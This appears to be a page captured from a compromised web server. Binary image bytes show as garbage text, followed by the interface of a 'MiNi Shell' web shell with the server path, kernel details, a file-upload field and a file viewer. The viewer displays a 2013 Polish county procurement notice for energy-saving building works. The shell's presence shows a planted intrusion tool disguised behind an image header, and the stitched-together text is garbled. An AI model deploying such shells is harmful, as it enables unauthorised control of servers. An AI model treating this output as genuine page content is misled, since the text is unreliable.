JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130613/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130613/227564-N-2013.html

<p class="kh_header"><b>Międzychód: Działania energooszczędne w budynkach użyteczności publicznej powiatu międzychodzkiego.</b><br>
<b>Numer ogłoszenia: 227564 - 2013; data zamieszczenia: 13.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Międzychodzki reprezentowany przez Zarząd Powiatu , ul. 17 Stycznia 143, 64-400 Międzychód, woj. wielkopolskie, tel. 095 7488726, faks 095 7482430.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat-miedzychodzki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Działania energooszczędne w budynkach użyteczności publicznej powiatu międzychodzkiego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie robót budowlanych w 14 obiektach użyteczności publicznej, zlokalizowanych w: Międzychodzie, Sierakowie, Łężeczkach i Piłce - Zamyślinie w powiecie międzychodzkim. 
W zakres zamówienia wchodzi: 
- montaż instalacji kolektorów słonecznych płaskich 52 szt. w obiekcie szpitala SP ZOZ w Międzychodzie ul. Szpitalna 10; 
- docieplenie ścian styropianem, styrodurem i wełną mineralną obiektu szpitala SP ZOZ w Międzychodzie na łącznej powierzchni 3268 m2; 
- modernizacja instalacji c.o polegająca na montażu przygrzejnikowych zaworów termostatycznych 792 szt. w obiektach: Zespołu Szkół nr 1, Zespołu Szkół nr 2  i  Zespołu Szkół nr 3 w Międzychodzie, DPS Piłka Zamyślin, Zespołu Szkół w Sierakowie;
 - montaż samoregulujących nawiewników okiennych 800 szt. w obiektach: Zespołu Szkół nr2, Zespołu Szkół nr 3 i Starostwa Powiatowego w Międzychodzie,  DPS Piłka Zamyślin, Zespołu Szkół w Sierakowie;
- docieplenie stropodachu z użyciem styropapy gr. 15 cm. na łącznej pow. 1359 m2 w obiekcie Specjalnego Ośrodka Szkolno - Wychowawczego w Międzychodzie;
- docieplenie stropodachu z użyciem wełny mineralnej gr. 15 cm. na łącznej pow. 2570,60 m2 w obiektach: szpitala SP ZOZ w Międzychodzie i DPS w Łężeczkach;
- wdrożenie systemu kompleksowego zarządzania energią (2 komplety, obiekty:  Starostwa Powiatowego i internatu Zespołu Szkół nr 3 w Międzychodzie);
- czyszczenie chemiczne instalacji c.o. w obiektach: szpitala SP ZOZ i Zespołu Szkół nr 1 w Międzychodzie
- oraz inne roboty budowlane wymienione w  dokumentacji wykonawczej.

Dopuszczono oferty częściowe i podział zakresu zamówienia na następujące części:
1) działania energooszczędne w obiekcie szpitala SP ZOZ w Międzychodzie ,
2) roboty budowlane instalacji c.o. w budynkach powiatu międzychodzkiego,
3) roboty budowlane - izolacje cieplne dachów w budynkach powiatu międzychodzkiego, 
4) roboty budowlane - montaż samoregulujących nawiewników okiennych.

Oferty będą oceniane na każdą część osobno, podpisane zostaną osobne umowy na każdą część zamówienia..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.33.11.00-7, 45.44.30.00-4, 45.32.10.00-3, 45.33.12.10-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> całość łącznie 23.000,00 
lub
na część 1) 15.000,00 ;
na część 2)   3.000,00  ;
na część 3)   3.000,00  ;
na część 4)   2.000,00  .</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wg oceny: spełnia/nie spełnia, na podstawie złożonego oświadczenia wg wzoru druku z siwz.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wg oceny: spełnia/nie spełnia, na podstawie złożonego oświadczenia wg wzoru druku z siwz; oraz w przypadku składania oferty na część 1 - wykazu robót z ostatnich 5 lat (z wykazaniem wykonywania co najmniej 1 robót o podobnym charakterze i zakresie tj. roboty budowlane termomodernizacyjne  o  wartości brutto min. 500.000,00 zł każda oraz co najmniej 1 robót montażu kolektorów słonecznych o łącznej powierzchni min. 100 m2) wg wzoru druku z siwz</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wg oceny: spełnia/nie spełnia, na podstawie złożonego oświadczenia wg wzoru druku z siwz</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wg oceny: spełnia/nie spełnia, na podstawie złożonego oświadczenia wg wzoru druku z siwz oraz wykazu kadry kierowniczej wg wzoru druku z siwz, z wykazaniem dysponowania kierownikiem budowy posiadającym uprawnienia kierownicze ogólnobudowlane i należącym do  Izby samorządu zawodowego, oraz  w przypadku składania oferty na część nr 1 lub część  nr 2 również kierownikiem robót instalacji sanitarnych z uprawnieniami i należącym do Izby samorządu zawodowego.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wg oceny: spełnia/nie spełnia, na podstawie złożonego oświadczenia o niezaleganiu z płatnościami podatków i opłat na ubezpieczenia społeczne wg wzoru druku z siwz oraz  na podstawie przedłożonej polisy lub innego dokumentu potwierdzającego ubezpieczenie z wykazaniem ubezpieczenia OC w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia  .</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">referencje dotyczące wykonanych robót, lub inne dokumenty potwierdzające prawidłowe ich wykonanie .
Do oferty na część 1 należy przedłożyć opis urządzeń technicznych (kolektorów słonecznych)</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenie o podwykonawcach</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmiany umowy tylko w  postaci  pisemnego aneksu.
Dopuszcza się zmiany treści umowy, gdy konieczność wprowadzenia takich zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy lub z działania siły wyższej. 
W przypadku uzasadnionego technicznie i uzgodnionego obustronnie odstąpienia od  wykonywania części robót - płatność zostanie umniejszona o wartości wynikające ze stawek jednostkowych oferty.
Dopuszcza się zmianę zakresu przewidzianego dla podwykonawców; 
W uzasadnionych okolicznościach dopuszczalna jest zmiana kierownika budowy i innych osób   wykonujących zamówienie; 
 W przypadku zmiany przepisów obowiązujących w przedmiocie stawki podatku VAT określonej w ofercie wykonawcy, wartość brutto zamówienia zostanie odpowiednio dostosowana aneksem, kwota netto pozostanie bez zmian;
Dopuszcza się zmiany technologiczne - gdy są spowodowane szczególnie  następującymi okolicznościami: pojawieniem się na rynku  materiałów lub urządzeń nowszej generacji pozwalających na zaoszczędzenie kosztów realizacji przedmiotu umowy lub kosztów eksploatacyjnych wykonanego przedmiotu umowy, lub umożliwiające uzyskanie lepszej jakości robót; 
Dopuszcza się modyfikację treści umowy spowodowaną zmianą przepisów prawa.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> BIP Starostwa:www.powiat.miedzychod.samorzady.pl (w zakładce: zamówienia publiczne/przetargi/2013)<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wydział Promocji, Rozwoju, Turystyki i Zamówień Publicznych Starostwa Powiatowego w Międzychodzie ul. 17 Stycznia 143 pok. 212, 64 - 400 Międzychód.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.06.2013 godzina 11:00, miejsce: Sekretariat   Starostwa Powiatowego , ul. 17 Stycznia 143, pok. 209 , 64 - 400 Międzychód.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Inwestycja jest współfinansowana ze środków Narodowego Funduszu Ochrony Środowiska i Gospodarki Wodnej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Działania energooszczędne w obiekcie szpitala SP ZOZ w Międzychodzie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Są to roboty dotyczące obiektu szpitala SP ZOZ w Międzychodzie ul. Szpitalna 10:
 - montaż instalacji kolektorów słonecznych płaskich 52 szt. na obiekcie szpitala; 
- docieplenie ścian szpitala styropianem, styrodurem i wełną mineralną na łącznej powierzchni 3268 m2; 
- docieplenie stropodachu szpitala z użyciem wełny mineralnej gr. 15 cm. na łącznej pow. 660,60 m2 
- czyszczenie chemiczne instalacji c.o.
- oraz inne roboty budowlane wymienione w  dokumentacji wykonawczej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.44.30.00-4, 45.33.11.00-7, 45.32.10.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Roboty budowlane instalacji c.o. w budynkach 	powiatu międzychodzkiego..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Roboty dotyczące instalacji c.o.:   
- modernizacja instalacji c.o polegająca na montażu przygrzejnikowych zaworów termostatycznych 792 szt. w obiektach: Zespołu Szkół nr 1, Zespołu Szkół nr 2  i  Zespołu Szkół nr 3 w Międzychodzie, DPS Piłka Zamyślin, Zespołu Szkół w Sierakowie;
- czyszczenie chemiczne instalacji c.o. w obiekcie Zespołu Szkół nr 1 w Międzychodzie
- inne roboty budowlane wymienione w  dokumentacji wykonawczej,
oraz :
- wdrożenie systemu kompleksowego zarządzania energią (2 komplety, obiekty:  Starostwa Powiatowego i internatu Zespołu Szkół nr 3 w Międzychodzie)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.33.11.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 16.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Roboty budowlane - izolacje cieplne dachów 
w budynkach powiatu międzychodzkiego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Są to roboty dotyczące obiektów: Specjalnego Ośrodka Szkolno - Wychowawczego w Międzychodzie ul. Gwardii Ludowej 6b oraz Domu Pomocy Społecznej w Łężeczkach
- docieplenie stropodachu z użyciem styropapy gr. 15 cm. na łącznej pow. 1359 m2 w obiekcie Specjalnego Ośrodka Szkolno - Wychowawczego w Międzychodzie;
- docieplenie stropodachu z użyciem wełny mineralnej gr. 15 cm. na łącznej pow. 1910 m2 w obiekcie  DPS w Łężeczkach;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.32.10.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Roboty budowlane - montaż samoregulujących nawiewników okiennych w budynkach powiatu międzychodzkiego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Roboty polegają na montażu 800 szt. samoregulujących nawiewników okiennych w obiektach: Zespołu Szkół nr 2, Zespołu Szkół nr 3 i Starostwa Powiatowego w Międzychodzie,  DPS Piłka Zamyślin, Zespołu Szkół w Sierakowie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.33.12.10-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 17.02.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com